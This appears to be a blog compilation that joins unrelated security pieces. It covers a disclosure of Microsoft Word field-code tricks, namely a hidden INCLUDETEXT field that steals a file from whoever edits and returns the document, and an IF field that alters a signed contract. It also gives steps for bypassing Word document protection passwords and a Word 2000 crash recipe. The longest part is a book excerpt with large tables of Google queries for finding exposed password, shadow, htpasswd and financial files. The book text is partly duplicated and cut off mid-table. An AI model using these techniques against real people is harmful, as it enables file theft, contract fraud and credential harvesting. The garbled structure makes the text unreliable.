I have stumbled onto a couple potential security issue in Microsoft
Word blogs i would like to share. In both cases the adversary (mis)uses
fields to perpetrate the attack. It's important to note that fields are not macros and, as far
as I know, cannot be disabled by the user. I am providing a basic
description along with a proof-of-concept demo. I am fairly certain
that someone with free time and imagination can expand on these
principles, possibly applying them to other products.
Following tradition I'll use Hacker and Victim as the two parties involved.
Hacker will be the adversary.
1) Document collaboration spyware.
Attack Basics: Hacker sends Victim a Word document for revisions. After Victim
edits, saves, and mails it back to Hacker the file will also include
contents of another file(s) from Victim's computer that Hacker has
specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field
into the document. The field results in inclusion of a specified file
into the current document. Of course, Hacker must be careful include it
in such a way that it does not become apparent to Victim. Hacker can do all
the usual things like hidden text, small white font, etc. Alternatively
(and in my opinion cleaner, she can embed the INCLUDETEXT field within
a dummy IF field that always returns an empty string. In this case, the
only way Victim can notice the included file is if he goes browsing
through field codes.
Attack Improvements: The disadvantage of the basic attack is that Hacker
must rely on Victim to update the INCLUDETEXT field to import the file. If
the document is large and contains tables of contents, figures, etc.
then Victim is very likely to update all the fields. However, Hacker would
like to make sure that the field gets updated regardless of whether Victim
does it manually or not. Automatic updates can be forced if a DATE
field is embedded into the INCLUDETEXT and it is the last date field in
the document (don't ask me why).
Proof of concept: Inserting the following field structure into the
footer of the last page will steal the contents of c:a.txt on the
target's computer. Keep in mind the plain curly braces below must
actually be replaced with Word field braces (you can either use the
menus to insert fields one by one, or ask google how to do it by hand).
{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }
Countermeasures: The only thing you can do now is decide how paranoid
you want to be. If you must edit and send out a Word file with unknown
origins, you may want to manually go through the fields. It would be
nice to be able to force user confirmation (via a dialog box) for all
includes. Alternatively one could write a scanner. Of course an optional
standalone checker will never be used by those most at risk.
2) Oblivious signing
Attack Basics: Hacker and Victim wants to sign a contract saying that Hacker
will pay Victim $100. Hacker types it up as a Word document and both
digitally sign it. In a few days Victim comes to Hacker to collect his
money. To his surprise, Hacker presents him with a Word document that
states he owes her $100. Hacker also has a valid signature from Victim for
the new document. In fact, it is the exact same signature as for the
contract Victim remembers signing and, to Victim's great amazement, the two
Word documents are actually identical in hex. What Hacker did was insert
an IF field that branched on an external input such as date or
filename. Thus even though the sign contents remained the same, the
displayed contents changed because they were partially dependent on
unsigned inputs. The basic point is that very few users know the actual
contents of their Word documents and it should be obvious that one
should never sign what one cannot read. Of course, Victim could contest
the contract in court. An expert witness (that's actually an expert)
could easily demonstrate that there are unsigned inputs and therefore
it is not clear which version was actually signed. Thus Victim can get out
of the fraudulent contract. However, the same logic will hold for Hacker
and she gets away without paying Victim $100 she signed for. Thus, an
adversary can build in a free escape clause. Note that I am just
speculating about all the legal aspects.
Proof of concept: Inserting the following field structure at the tail
of the document will cause "Hello" to be displayed if the filename is
"a.doc" and "Bye" otherwise.
{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }
Update : this flaw has been fixed in office 2003 onwards
but still works in office 2000 and even sometimes in 2002/03
__________________________________________________________________________
We can
consistently crash Word 2000 using the following method:
1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar
This consistenly crashes Word 2000 with the following error
message:
DDE Server Window: WINWORD.EXE - Application Error
The instruction at "0x3076a63e" referenced memory at "0x00000000". The
memory could not be "read".
Vulnerability:
remove office passwords
Vulnerable:
MS Word (Win2K/XP)
Example 1
1) Open MS Word with a new/blank page
2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc
3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...
Example 2
1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)
2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)
3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)
4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a password
Change password if ya like & or save in whatever format if ya like ...
Thursday, November 6, 2008
Search passwords and Juicy Info : Digg Google
Introduction
This is not about finding sensitive data during an assessment as much as
it is about what the “bad guys” might do to troll for the data.The examples presented
generally represent the lowest-hanging fruit on the security
tree. Hackers target this information on a daily basis.To protect against this type
of attacker, we need to be fairly candid about the worst-case possibilities.We
won’t be overly candid, however.
We start by looking at some queries that can be used to uncover usernames,
the less important half of most authentication systems.The value of a username is
often overlooked, but, an entire multimilliondollar
security system can be shattered through skillful crafting of even the
smallest, most innocuous bit of information.
Next, we take a look at queries that are designed to uncover passwords. Some
of the queries we look at reveal encrypted or encoded passwords, which will take
a bit of work on the part of an attacker to use to his or her advantage.We also
take a look at queries that can uncover cleartext passwords.These queries are some
of the most dangerous in the hands of even the most novice attacker. What could
make an attack easier than handing a username and cleartext password to an
attacker?
We wrap up by discussing the very real possibility of uncovering
highly sensitive data such as credit card information and information used to
commit identity theft, such as Social Security numbers. Our goal here is to
explore ways of protecting against this very real threat.To that end, we don’t go
into details about uncovering financial information and the like. If you’re a “dark
side” hacker, you’ll need to figure these things out on your own.
Searching for Usernames
Most authentication mechanisms use a username and password to protect information.
To get through the “front door” of this type of protection, you’ll need to
determine usernames as well as passwords. Usernames also can be used for social
engineering efforts, as we discussed earlier.
Many methods can be used to determine usernames. In Chapter 10, we
explored ways of gathering usernames via database error messages. In Chapter 8
we explored Web server and application error messages that can reveal various
information, including usernames.These indirect methods of locating usernames
are helpful, but an attacker could target a usernames directory
query like “your username is”. This phrase can locate help pages that describe the
username creation process,
information gleaned from other sources, such as Google Groups posts or phone
listings.The usernames could then be recycled into various other phases of the
attack, such as a worm-based spam campaign or a social-engineering attempt.An
attacker can gather usernames from a variety of sources, as shown in the sample
queries listed
Sample Queries That Locate Usernames
Query Description
inurl:admin inurl:userlist Generic userlist files
inurl:admin filetype:asp Generic userlist files
inurl:userlist
inurl:php inurl:hlstats intext: Half-life statistics file, lists username and
Server Username other information
filetype:ctl inurl:haccess. Microsoft FrontPage equivalent of htaccess
ctl Basic shows Web user credentials
Query Description
filetype:reg reg intext: Microsoft Internet Account Manager can
”internet account manager” reveal usernames and more
filetype:wab wab Microsoft Outlook Express Mail address
books
filetype:mdb inurl:profiles Microsoft Access databases containing (user)
profiles.
index.of perform.ini mIRC IRC ini file can list IRC usernames and
other information
inurl:root.asp?acs=anon Outlook Mail Web Access directory can be
used to discover usernames
filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
conf –sample username and server information
filetype:log username putty PUTTY SSH client logs can reveal usernames
and server information
filetype:rdp rdp Remote Desktop Connection files reveal user
credentials
intitle:index.of .bash_history UNIX bash shell history reveals commands
typed at a bash command prompt; usernames
are often typed as argument strings
intitle:index.of .sh_history UNIX shell history reveals commands typed at
a shell command prompt; usernames are
often typed as argument strings
“index of ” lck Various lock files list the user currently using
a file
+intext:webalizer +intext: Webalizer Web statistics page lists Web user-
Total Usernames +intext: names and statistical information
”Usage Statistics for”
filetype:reg reg HKEY_ Windows Registry exports can reveal
CURRENT_USER username usernames and other information
Underground Googling
Searching for a Known Filename
Remember that there are several ways to search for a known filename.
One way relies on locating the file in a directory listing, like intitle:index.of
install.log. Another, often better, method relies on the filetype operator,
as in filetype:log inurl:install.log. Directory listings are not all that
common. Google will crawl a link to a file in a directory listing, meaning
that the filetype method will find both directory listing entries as well as
files crawled in other ways.
In some cases, usernames can be gathered from Web-based statistical programs
that check Web activity.The Webalizer program shows all sorts of information
about a Web server’s usage. Output files for the Webalizer program can be
located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage
Statistics for”. Among the information displayed is the username that was used to
connect to the Web server, as shown in Figure 9.2. In some cases, however, the
usernames displayed are not valid or current, but the “Visits” column lists the
number of times a user account was used during the capture period.This enables
an attacker to easily determine which accounts are more likely to be valid.
The Windows registry holds all sorts of authentication information, including
usernames and passwords.Though it is unlikely (and fairly uncommon) to locate
live, exported Windows registry files on the Web, at the time of this writing
there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
username, which locates Windows registry files that contain the word username
and in some cases passwords,
As any talented attacker or security person will tell you, it’s rare to get information
served to you on a silver platter. Most decent finds take a bit of persistence,
creativity, intelligence, and just a bit of good luck. For example, consider
the Microsoft Outlook Web Access portal, which can be located with a query
like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
returned by this query, even though there a certainly more than 50 sites running
the Microsoft Web-based mail portal. Regardless of how you might locate a site
running this e-mail gateway, it’s not uncommon for the site to host a public
directory (denoted “Find Names,” by default)
The public directory allows access to a search page that can be used to find
users by name. In most cases, wildcard searching is not allowed, meaning that a
search for * will not return a list of all users, as might be expected. Entering a
search for a space is an interesting idea, since most user descriptions contain a
space, but most large directories will return the error message “This query would
return too many addresses!” Applying a bit of creativity, an attacker could begin
searching for individual common letters, such as the “Wheel of Fortune letters”
R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list
of user information like
Once a list of user information is returned, the attacker can then recycle the
search with words contained in the user list, searching for the words Voyager,
Freshmen, or Campus, for example.Those results can then be recycled, eventually
resulting in a nearly complete list of user information.
Searching for Passwords
Password data, one of the “Holy Grails” during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate
passwords on the Web, as shown in Table 9.2.
Table 9.2 Queries That Locate Password Information
Query Description
inurl:/db/main.mdb ASP-Nuke passwords
filetype:cfm “cfapplication ColdFusion source with potential passwords
name” password
filetype:pass pass intext:userid dbman credentials
allinurl:auth_user_file.txt DCForum user passwords
eggdrop filetype:user user Eggdrop IRC user credentials
filetype:ini inurl:flashFXP.ini FlashFXP FTP credentials
filetype:url +inurl:”ftp://” FTP bookmarks cleartext passwords
+inurl:”@”
inurl:zebra.conf intext: GNU Zebra passwords
password -sample -test
-tutorial –download
filetype:htpasswd htpasswd HTTP htpasswd Web user credentials
intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
“htgroup” -intitle:”dist”
-apache -htpasswd.c
intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials
htpasswd.bak
“http://*:*@www” bob:bob HTTP passwords (bob is a sample username)
“sets mode: +k” IRC channel keys (passwords)
“Your password is * Remember IRC NickServ registration passwords
this for later use”
signin filetype:url JavaScript authentication credentials
Queries That Locate Password Information
Query Description
LeapFTP intitle:”index.of./” LeapFTP client login credentials
sites.ini modified
inurl:lilo.conf filetype:conf LILO passwords
password -tatercounter2000
-bootpwd –man
filetype:config config intext: Microsoft .NET application credentials
appSettings “User ID”
filetype:pwd service Microsoft FrontPage Service Web passwords
intitle:index.of Microsoft FrontPage Web credentials
administrators.pwd
“# -FrontPage-” inurl:service.pwd Microsoft FrontPage Web passwords
ext:pwd inurl:_vti_pvt inurl: Microsoft FrontPage Web passwords
(Service | authors | administrators)
inurl:perform filetype:ini mIRC nickserv credentials
intitle:”index of” intext: mySQL database credentials
connect.inc
intitle:”index of” intext: mySQL database credentials
globals.inc
filetype:conf oekakibbs Oekakibss user passwords
filetype:dat wand.dat Opera‚ ÄúMagic Wand‚Äù Web credentials
inurl:ospfd.conf intext: OSPF Daemon Passwords
password -sample -test
-tutorial –download
index.of passlist Passlist user credentials
inurl:passlist.txt passlist.txt file user credentials
filetype:dat “password.dat” password.dat files
inurl:password.log filetype:log password.log file reveals usernames, passwords,
and hostnames
filetype:log inurl:”password.log” password.log files cleartext passwords
inurl:people.lst filetype:lst People.lst generic password file
intitle:index.of config.php PHP Configuration File database credentials
inurl:config.php dbuname dbpass PHP Configuration File database credentials
inurl:nuke filetype:sql PHP-Nuke credentials
Queries That Locate Password Information
Query Description
filetype:conf inurl:psybnc.conf psyBNC IRC user credentials
“USER.PASS=”
filetype:ini ServUDaemon servU FTP Daemon credentials
filetype:conf slapd.conf slapd configuration files root password
inurl:”slapd.conf” intext: slapd LDAP credentials
”credentials” -manpage
-”Manual Page” -man: -sample
inurl:”slapd.conf” intext: slapd LDAP root password
”rootpw” -manpage
-”Manual Page” -man: -sample
filetype:sql “IDENTIFIED BY” –cvs SQL passwords
filetype:sql password SQL passwords
filetype:ini wcx_ftp Total Commander FTP passwords
filetype:netrc password UNIX .netrc user credentials
index.of.etc UNIX /etc directories contain various credential
files
intitle:”Index of..etc” passwd UNIX /etc/passwd user credentials
intitle:index.of passwd UNIX /etc/passwd user credentials
passwd.bak
intitle:”Index of” pwd.db UNIX /etc/pwd.db credentials
intitle:Index.of etc shadow UNIX /etc/shadow user credentials
intitle:index.of master.passwd UNIX master.passwd user credentials
intitle:”Index of” spwd.db UNIX spwd.db credentials
passwd -pam.conf
filetype:bak inurl:”htaccess| UNIX various password file backups
passwd|shadow|htusers
filetype:inc dbconn Various database credentials
filetype:inc intext:mysql_ Various database credentials, server names
connect
filetype:properties inurl:db Various database credentials, server names
intext:password
inurl:vtund.conf intext:pass –cvs Virtual Tunnel Daemon passwords
inurl:”wvdial.conf” intext: wdial dialup user credentials
Queries That Locate Password Information
Query Description
filetype:mdb wwforum Web Wiz Forums Web credentials
“AutoCreate=TRUE password=*”Website Access Analyzer user passwords
filetype:pwl pwl Windows Password List user credentials
filetype:reg reg +intext: Windows Registry Keys containing user
”defaultusername” intext: credentials
”defaultpassword”
filetype:reg reg +intext: Windows Registry Keys containing user
”internet account manager” credentials
“index of/” “ws_ftp.ini” WS_FTP FTP credentials
“parent directory”
filetype:ini ws_ftp pwd WS_FTP FTP user credentials
inurl:/wwwboard wwwboard user credentials
In most cases, passwords discovered on the Web are either encrypted or
encoded in some way. In most cases, these passwords can be fed into a password
cracker such as John the Ripper from www.openwall.com/john to produce
plaintext passwords that can be used in an attack. Figure 9.6 shows the results of
the search ext:pwd inurl:_vti_pvt inurl:(Service | authors | administrators), which
combines a search for some common
Exported Windows registry files often contain encrypted or encoded passwords
as well. If a user exports the Windows registry to a file and Google subsequently
crawls that file, a query like filetype:reg intext:”internet account manager”
could reveal interesting keys containing password data
ress. Note that live, exported Windows registry files are not very common, but it’s
not uncommon for an attacker to target a site simply because of one exceptionally
insecure file. It’s also possible for a Google query to uncover cleartext passwords.
These passwords can be used as is without having to employ a
password-cracking utility. In these extreme cases, the only challenge is determining
the username as well as the host on which the password can be used. As
shown in Figure 9.8, certain queries will locate all the following information:
usernames, cleartext passwords, and the host that uses that authentication!
There is no magic query for locating passwords, but during an assessment,
remember that the simplest queries directed at a site can have amazing results, as
we discussed in , Chapter 7, Ten Simple Searches. For example, a query like “Your
password” forgot would locate pages that provide a forgotten password recovery
mechanism.The information from this type of query can be used to formulate
any of a number of attacks against a password. As always, effective social engineering
is a terrific nontechnical solution to “forgotten” passwords.
Another generic search for password information, intext:(password | passcode |
pass) intext:(username | userid | user), combines common words for passwords and
user IDs into one query.This query returns a lot of results, but the vast majority
of the top hits refer to pages that list forgotten password information, including
either links or contact information. Using Google’s translate feature, found at
http://translate.google.com/translate_t, we could also create multilingual password
searches.Table 9.3 lists common translations for the word password
English Translations of the Word Password
Language Word Translation
German password Kennwort
Spanish password contraseña
French password mot de passe
Italian password parola d’accesso
Portuguese password senha
Dutch password Paswoord
NOTE
The terms username and userid in most languages translate to username
and userid, respectively.
Searching for Credit Card Numbers,
Social Security Numbers, and More
Most people have heard news stories about Web hackers making off with customer
credit card information.With so many fly-by night retailers popping up
on the Internet, it’s no wonder that credit card fraud is so prolific.These momand-
pop retailers are not the only ones successfully compromised by hackers.
Corporate giants by the hundreds have had financial database compromises over
the years, victims of sometimes very technical, highly focused attackers. What
might surprise you is that it doesn’t take a rocket scientist to uncover live credit
card numbers on the Internet, thanks to search engines like Google. Everything
from credit information to banking data or supersensitive classified government
documents can be found on the Web. Consider the (highly edited) Web page
This document, found using Google, lists hundreds and hundreds of credit
card numbers (including expiration date and card validation numbers) as well as
the owners’ names, addresses, and phone numbers.This particular document also
included phone card (calling card) numbers. Notice the scroll bar on the righthand
side of Figure 9.9, an indicator that the displayed page is only a small part
of this huge document—like many other documents of its kind. In most cases,
pages that contain these numbers are not “leaked” from online retailers or ecommerce
sites but rather are most likely the fruits of a scam known as phishing,
in which users are solicited via telephone or e-mail for personal information.
Several Web sites, including MillerSmiles.co.uk, document these scams and
hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that
encourages users to update their eBay profile information.
Once a user fills out this form, all the information is sent via e-mail to the
attacker, who can use it for just about anything.
Tools and Traps
Catching Online Scammers
In some cases, you might be able to use Google to help nab the bad guys.
Phishing scams are effective because the fake page looks like an official
page. To create an official-looking page, the bad guys must have examples
to work from, meaning that they must have visited a few legitimate companies’
Web sites. If the fishing scam was created using text from several
companies’ existing pages, you can key in on specific phrases from the fake
page, creating Google queries designed to round up the servers that hosted
some of the original content. Once you’ve located the servers that contained
the pilfered text, you can work with the companies involved to
extract correlating connection data from their log files. If the scammer visited
each company’s Web page, collecting bits of realistic text, his IP should
appear in each of the log files. Auditors at SensePost (www.sensepost.com)
have successfully used this technique to nab online scam artists.
Unfortunately, if the scammer uses an exact copy of a page from only one
company, this task becomes much more difficult to accomplish.
Social Security Numbers
Social Security numbers (SSNs) and other sensitive data can be easily located
with Google as well as via the same techniques used to locate credit card numbers.
For a variety of reasons, SSNs might appear online—for example, educational
facilities are notorious for using an SSN as a student ID, then posting
grades to a public Web site with the “student ID” displayed next to the grade.A
creative attacker can do quite a bit with just an SSN, but in many cases it helps
to also have a name associated with that SSN. Again, educational facilities have
been found exposing this information via Excel spreadsheets listing student’s
names, grades, and SSNs, despite the fact that the student ID number is often
used to help protect the privacy of the student! Although we don’t feel it’s right
to go into the details of how this data is located, several media outlets have irresponsibly
posted the details online. Although the blame lies with the sites that are
leaking this information, in our opinion it’s still not right to draw attention to
how exactly the information can be located.
Personal Financial Data
In some cases, phishing scams are responsible for publicizing personal information;
in other cases, hackers attacking online retails are to blame for this breach of
privacy. Sadly, there are many instances where an individual is personally responsible
for his own lack of privacy. Such is the case with personal financial information.
With the explosion of personal computers in today’s society, users have
literally hundreds of personal finance programs to choose from. Many of these
programs create data files with specific file extensions that can be searched with
Google. It’s hard to imagine why anyone would post personal financial information
to a public Web site (which subsequently gets crawled by Google), but it
must happen quite a bit, judging by the number of hits for program files generated
by Quicken and Microsoft Money, for example. Although it would be
somewhat irresponsible to provide queries here that would unearth personal
financial data, it’s important to understand the types of data that could potentially
be uncovered by an attacker.To that end,Table 9.4 shows file extensions for various
financial, accounting, and tax return programs. Ensure that these filetypes
aren’t listed on a webserver you’re charged with protecting.
File Extension Description
afm Abassis Finance Manager
ab4 Accounting and Business File
mmw AceMoney File
Iqd AmeriCalc Mutual Fund Tax Report
et2 Electronic Tax Return Security File (Australia)
tax Intuit TurboTax Tax Return
t98-t04 Kiplinger Tax Cut File (extension based on two-digit return
year)
mny Microsoft Money 2004 Money Data Files
mbf Microsoft Money Backup Files
inv MSN Money Investor File
ptdb Peachtree Accounting Database
qbb QuickBooks Backup Files reveal financial data
qdf Quicken personal finance data
soa Sage MAS 90 accounting software
sdb Simply Accounting
stx Simply Tax Form
tmd Time and Expense Tracking
tls Timeless Time & Expense
fec U.S. Federal Campaign Expense Submission
wow Wings Accounting File
Searching for Other Juicy Info
As we’ve seen, Google can be used to locate all sorts of sensitive information. In
this section we take a look at some of the data that Google can find that’s harder
to categorize. From address books to chat log files and network vulnerability
reports, there’s no shortage of sensitive data online.Table 9.5 shows some queries
that can be used to uncover various types of sensitive data.
Query Description
intext:”Session Start AIM and IRC log files
* * * *:*:* *” filetype:log
filetype:blt blt +intext: AIM buddy lists
screenname
buddylist.blt AIM buddy lists
intitle:index.of cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
inurl:cgiirc.config CGIIRC (Web-based IRC client) config file,
shows IRC servers and user credentials
“Index of” / “chat/logs” Chat logs
intitle:”Index Of” cookies.txt cookies.txt file reveals user information
“size”
“phone * * *” “address *” Curriculum vitae (resumes) reveal names
“e-mail” intitle:”curriculum vitae” and address information
ext:ini intext:env.ini Generic environment data
intitle:index.of inbox Generic mailbox files
“Running in Child mode” Gnutella client data and statistics
“:8080” “:3128” “:80” HTTP Proxy lists
filetype:txt
intitle:”Index of” ICQ chat logs
dbconvert.exe chats
“sets mode: +p” IRC private channel information
“sets mode: +s” IRC secret channel information
“Host Vulnerability Summary ISS vulnerability scanner reports, reveal
Report” potential vulnerabilities on hosts and
networks
“Network Vulnerability ISS vulnerability scanner reports, reveal
Assessment Report” potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot John the Ripper password cracker results
intitle:”Index Of” -inurl:maillog Maillog files reveals e-mail traffic
maillog size information
ext:mdb inurl:*.mdb inurl: Microsoft FrontPage database folders
Query Description
filetype:xls inurl:contact Microsoft Excel sheets containing contact
information.
intitle:index.of haccess.ctl Microsoft FrontPage equivalent(?)of htaccess
shows Web authentication info
ext:log “Software: Microsoft Microsoft Internet Information Services
Internet Information Services *.*” (IIS) log files
filetype:pst inurl:”outlook.pst” Microsoft Outlook e-mail and calendar
backup files
intitle:index.of mt-db-pass.cgi Movable Type default file
filetype:ctt ctt messenger MSN Messenger contact lists
“This file was generated Nessus vulnerability scanner reports, reveal
by Nessus” potential vulnerabilities on hosts and networks
inurl:”newsletter/admin/” Newsletter administration information
inurl:”newsletter/admin/” Newsletter administration information
intitle:”newsletter admin”
filetype:eml eml intext: Outlook Express e-mail files
”Subject” +From
intitle:index.of inbox dbx Outlook Express Mailbox files
intitle:index.of inbox dbx Outlook Express Mailbox files
filetype:mbx mbx intext:Subject Outlook v1–v4 or Eudora mailbox files
inurl:/public/?Cmd=contents Outlook Web Access public folders or
appointments
filetype:pdb pdb backup (Pilot Palm Pilot Hotsync database files
| Pluckerdb)
“This is a Shareaza Node” Shareaza client data and statistics
inurl:/_layouts/settings Sharepoint configuration information
inurl:ssl.conf filetype:conf SSL configuration files, reveal various configuration
information
site:edu admin grades Student grades
intitle:index.of mystuff.xml Trillian user Web links
inurl:forward filetype: UNIX mail forward files reveal e-mail
forward –cvs addresses
intitle:index.of dead.letter UNIX unfinished e-mails
Summary
Make no mistake—there’s sensitive data on the Web, and Google can find it.
There’s hardly any limit to the scope of information that can be located, if only
you can figure out the right query. From usernames to passwords, credit card and
Social Security numbers, and personal financial information, it’s all out there. As a
purveyor of the “dark arts,” you can relish in the stupidity of others, but as a professional
tasked with securing a customer’s site from this dangerous form of
information leakage, you could be overwhelmed by the sheer scale of your
defensive duties.
As droll as it might sound, a solid, enforced security policy is a great way to
keep sensitive data from leaking to the Web. If users understand the risks associated
with information leakage and understand the penalties that come with violating
policy, they will be more willing to cooperate in what should be a security
partnership.
In the meantime, it certainly doesn’t hurt to understand the tactics an adversary
might employ in attacking a Web server. One thing that should become
clear as you read this book is that any attacker has an overwhelming number of
files to go after. One way to prevent dangerous Web information leakage is by
denying requests for unknown file types. Whether your Web server normally
serves up CFM,ASP, PHP, or HTML, it’s infinitely easier to manage what should
be served by the Web server instead of focusing on what should not be served.
Adjust your servers or your border protection devices to allow only specific content
or file types.
Solutions Fast Track
Searching for Usernames
_ Usernames can be found in a variety of locations.
_ In some cases, digging through documents or e-mail directories might
be required.
_ A simple query such as “your username is” can be very effective in
locating usernames.
Searching for Passwords
_ Passwords can also be found in a variety locations.
_ A query such as “Your password” forgot can locate pages that provide a
forgotten-password recovery mechanism.
_ intext:(password | passcode | pass) intext:(username | userid | user) is
another generic search for locating password information.
Searching for Credit Cards
Numbers, Social Security Numbers, and More
_ Documents containing credit card and Social Security number
information do exist and are relatively prolific.
_ Some irresponsible news outlets have revealed functional queries that
locate this information.
_ There are relatively few examples of personal financial data online, but
there is a great deal of variety.
_ In most cases, specific file extensions can be searched for.
Searching for Other Juicy Info
_ From address books and chat log files to network vulnerability reports,
there’s no shortage of sensitive data online.
This is not about finding sensitive data during an assessment as much as
it is about what the “bad guys” might do to troll for the data.The examples presented
generally represent the lowest-hanging fruit on the security
tree. Hackers target this information on a daily basis.To protect against this type
of attacker, we need to be fairly candid about the worst-case possibilities.We
won’t be overly candid, however.
We start by looking at some queries that can be used to uncover usernames,
the less important half of most authentication systems.The value of a username is
often overlooked, but, an entire multimilliondollar
security system can be shattered through skillful crafting of even the
smallest, most innocuous bit of information.
Next, we take a look at queries that are designed to uncover passwords. Some
of the queries we look at reveal encrypted or encoded passwords, which will take
a bit of work on the part of an attacker to use to his or her advantage.We also
take a look at queries that can uncover cleartext passwords.These queries are some
of the most dangerous in the hands of even the most novice attacker. What could
make an attack easier than handing a username and cleartext password to an
attacker?
We wrap up by discussing the very real possibility of uncovering
highly sensitive data such as credit card information and information used to
commit identity theft, such as Social Security numbers. Our goal here is to
explore ways of protecting against this very real threat.To that end, we don’t go
into details about uncovering financial information and the like. If you’re a “dark
side” hacker, you’ll need to figure these things out on your own.
Searching for Usernames
Most authentication mechanisms use a username and password to protect information.
To get through the “front door” of this type of protection, you’ll need to
determine usernames as well as passwords. Usernames also can be used for social
engineering efforts, as we discussed earlier.
Many methods can be used to determine usernames. In Chapter 10, we
explored ways of gathering usernames via database error messages. In Chapter 8
we explored Web server and application error messages that can reveal various
information, including usernames.These indirect methods of locating usernames
are helpful, but an attacker could target a usernames directory
query like “your username is”. This phrase can locate help pages that describe the
username creation process,
information gleaned from other sources, such as Google Groups posts or phone
listings.The usernames could then be recycled into various other phases of the
attack, such as a worm-based spam campaign or a social-engineering attempt.An
attacker can gather usernames from a variety of sources, as shown in the sample
queries listed
Sample Queries That Locate Usernames
Query Description
inurl:admin inurl:userlist Generic userlist files
inurl:admin filetype:asp Generic userlist files
inurl:userlist
inurl:php inurl:hlstats intext: Half-life statistics file, lists username and
Server Username other information
filetype:ctl inurl:haccess. Microsoft FrontPage equivalent of htaccess
ctl Basic shows Web user credentials
Query Description
filetype:reg reg intext: Microsoft Internet Account Manager can
”internet account manager” reveal usernames and more
filetype:wab wab Microsoft Outlook Express Mail address
books
filetype:mdb inurl:profiles Microsoft Access databases containing (user)
profiles.
index.of perform.ini mIRC IRC ini file can list IRC usernames and
other information
inurl:root.asp?acs=anon Outlook Mail Web Access directory can be
used to discover usernames
filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
conf –sample username and server information
filetype:log username putty PUTTY SSH client logs can reveal usernames
and server information
filetype:rdp rdp Remote Desktop Connection files reveal user
credentials
intitle:index.of .bash_history UNIX bash shell history reveals commands
typed at a bash command prompt; usernames
are often typed as argument strings
intitle:index.of .sh_history UNIX shell history reveals commands typed at
a shell command prompt; usernames are
often typed as argument strings
“index of ” lck Various lock files list the user currently using
a file
+intext:webalizer +intext: Webalizer Web statistics page lists Web user-
Total Usernames +intext: names and statistical information
”Usage Statistics for”
filetype:reg reg HKEY_ Windows Registry exports can reveal
CURRENT_USER username usernames and other information
Underground Googling
Searching for a Known Filename
Remember that there are several ways to search for a known filename.
One way relies on locating the file in a directory listing, like intitle:index.of
install.log. Another, often better, method relies on the filetype operator,
as in filetype:log inurl:install.log. Directory listings are not all that
common. Google will crawl a link to a file in a directory listing, meaning
that the filetype method will find both directory listing entries as well as
files crawled in other ways.
In some cases, usernames can be gathered from Web-based statistical programs
that check Web activity.The Webalizer program shows all sorts of information
about a Web server’s usage. Output files for the Webalizer program can be
located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage
Statistics for”. Among the information displayed is the username that was used to
connect to the Web server, as shown in Figure 9.2. In some cases, however, the
usernames displayed are not valid or current, but the “Visits” column lists the
number of times a user account was used during the capture period.This enables
an attacker to easily determine which accounts are more likely to be valid.
The Windows registry holds all sorts of authentication information, including
usernames and passwords.Though it is unlikely (and fairly uncommon) to locate
live, exported Windows registry files on the Web, at the time of this writing
there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER
username, which locates Windows registry files that contain the word username
and in some cases passwords,
As any talented attacker or security person will tell you, it’s rare to get information
served to you on a silver platter. Most decent finds take a bit of persistence,
creativity, intelligence, and just a bit of good luck. For example, consider
the Microsoft Outlook Web Access portal, which can be located with a query
like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are
returned by this query, even though there a certainly more than 50 sites running
the Microsoft Web-based mail portal. Regardless of how you might locate a site
running this e-mail gateway, it’s not uncommon for the site to host a public
directory (denoted “Find Names,” by default)
The public directory allows access to a search page that can be used to find
users by name. In most cases, wildcard searching is not allowed, meaning that a
search for * will not return a list of all users, as might be expected. Entering a
search for a space is an interesting idea, since most user descriptions contain a
space, but most large directories will return the error message “This query would
return too many addresses!” Applying a bit of creativity, an attacker could begin
searching for individual common letters, such as the “Wheel of Fortune letters”
R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list
of user information like
Once a list of user information is returned, the attacker can then recycle the
search with words contained in the user list, searching for the words Voyager,
Freshmen, or Campus, for example.Those results can then be recycled, eventually
resulting in a nearly complete list of user information.
Searching for Passwords
Password data, one of the “Holy Grails” during a penetration test, should be protected.
Unfortunately, many examples of Google queries can be used to locate
passwords on the Web, as shown in Table 9.2.
Table 9.2 Queries That Locate Password Information
Query Description
inurl:/db/main.mdb ASP-Nuke passwords
filetype:cfm “cfapplication ColdFusion source with potential passwords
name” password
filetype:pass pass intext:userid dbman credentials
allinurl:auth_user_file.txt DCForum user passwords
eggdrop filetype:user user Eggdrop IRC user credentials
filetype:ini inurl:flashFXP.ini FlashFXP FTP credentials
filetype:url +inurl:”ftp://” FTP bookmarks cleartext passwords
+inurl:”@”
inurl:zebra.conf intext: GNU Zebra passwords
password -sample -test
-tutorial –download
filetype:htpasswd htpasswd HTTP htpasswd Web user credentials
